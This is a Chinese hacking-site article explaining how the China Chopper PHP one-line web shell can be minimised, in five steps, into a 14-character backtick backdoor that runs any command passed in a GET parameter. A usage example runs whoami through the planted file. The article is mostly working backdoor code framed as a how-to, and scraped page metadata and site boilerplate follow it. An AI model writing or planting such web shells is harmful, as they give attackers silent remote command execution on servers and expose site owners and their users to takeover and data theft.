黑基网 首页 学院 网络安全 查看内容

黑客用14个字符就能控制你的网站和服务器

2017-11-10 18:36| 投稿: xiaotiger |来自: 互联网

摘要: php的语言是很强大的,比强大更重要的是它的灵活性。由于它的灵活性,所以大量的php一句话web后门及变种在市面上比比皆是。最出名的莫过于桂林老兵写的菜刀软件里的一句话了。说句题外话,桂林老兵以前还是我同事的 ...

php的语言是很强大的,比强大更重要的是它的灵活性。由于它的灵活性,所以大量的php一句话web后门及变种在市面上比比皆是。最出名的莫过于桂林老兵写的菜刀软件里的一句话了。说句题外话,桂林老兵以前还是我同事的。

菜刀软件里自带的php一句话源码是:

<?php @eval($_POST['chopper']);?>

这个菜刀一句话很强大,几乎没有它做不了的事,文件修改、上传下载、数据库操作、执行命令等等,类似一个文件管理器一样的后门。抓个图你看下吧。

我们来数一下,带空格来算总共是34个字符。今天我们来改造一下,让其缩到最短。

第一步改造:php如果支持短标签的话,可以去掉“?”后边的php,所以可以改成:

<? @eval($_POST['chopper']);?>

变成了31个字符。

第二步改造:php文件中最后一行可以去掉“?>”,所以可以改成:

<? @eval($_POST['chopper']);

变成了29个字符。

第三步改造:把php代码中的容错符“@”去掉,并且把$_POST换成$_GET,代码变成了

<? eval($_GET['chopper']);

变成了27个字符。

第四步改造:把后门中的连接密码chopper,换成数字1,代码变成了

<? eval($_GET['1']);

变成了21个字符。

第五步改造:这个没法在形式上缩短了,只能改变其功能,让这个后门只保留一个功能。后门中最重要的功能是什么?当然是执行命令。如果php网站没有在php.ini做任何限制的话,哪么可以用Backticks来执行命令,就是用重音符来执行命令,所以我们最终的代码是去掉了eval,加上“`”,变成了下边的样子:

<? `$_GET[1]`;

带空格的话,只有14个字符。不带空格的话,是13个。13个数字是不是会让你想起犹大和黑色期五呢?好像是冥冥之中注定,最短是13个字母。剩哪个空格,是可怕的第13个人?

这个后门如何用呢?它只能执行命令,并没有回显。而且我们只用浏览器就能用。假如这个后门名叫1.php,哪么来执行一下。

//192.168.1.100/1.php?1=whoami > d:\1.txt

我是在windows服务器上执行的。linux服务器你相应的命令和路径也要改一下了。如果能执行命令的话,剩下的什么事你做不了呢?但是现在服务器一般都有360、安全狗之类的防护软件,所以这个php一句话在查杀之列,你也不用太担心。

, groupId: 6486604549095162381, itemId: 6486604549095162381, type: 2, subInfo: { isOriginal: true, source: 海阳顶端, time: 2017-11-10 10:18 }, tagInfo: { tags: [{"name":"编程语言"},{"name":"PHP"},{"name":"黑客"},{"name":"软件"},{"name":"Linux"}], groupId: 6486604549095162381, itemId: 6486604549095162381, repin: 0, } }, commentInfo: { groupId: 6486604549095162381, itemId: 6486604549095162381, comments_count: 0, ban_comment: 0 }, mediaInfo: { uid: 3668637589, name: 海阳顶端, avatar: //p1.pstatp.com/large/3e5b0003e8b7bba867b3, openUrl: /c/user/3668637589/, follow: false }, pgcInfo: {"media_info":{"open_url":"/c/user/3668637589/","avatar_url":"https://p1.pstatp.com/large/3e5b0003e8b7bba867b3","media_id":1580381063112717,"name":"海阳顶端","user_verified":false},"articles":[{"item_id":"6486604549095162381","url":"/item/6486604549095162381","title":"黑客用14个字符就能控制你的网站和服务器"},{"item_id":"6486283801990267406","url":"/item/6486283801990267406","title":"万能投票器软件演示,模仿手机自动点击头条文章和点击展开阅读"},{"item_id":"6486224706746712589","url":"/item/6486224706746712589","title":"win7以上才有的远程命令,80%黑客还不会用,也不了解其权限"},{"item_id":"6485866012209054221","url":"/item/6485866012209054221","title":"来,自己亲手打造一个中午吃什么的app,三分钟学会做安卓软件"}]}, feedInfo: { url: /api/pc/feed/, category: __all__, initList: [] }, shareInfo: { shareUrl: https://m.toutiao.com/i6486604549095162381/, abstract: php的语言是很强大的,比强大更重要的是它的灵活性。由于它的灵活性,所以大量的php一句话web后门及变种在市面上比比皆是。最出名的莫过于桂林老兵写的菜刀软件里的一句话了。说句题外话,桂林老兵以前还是我同事的。菜刀软件里自带的php一句话源码是:
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部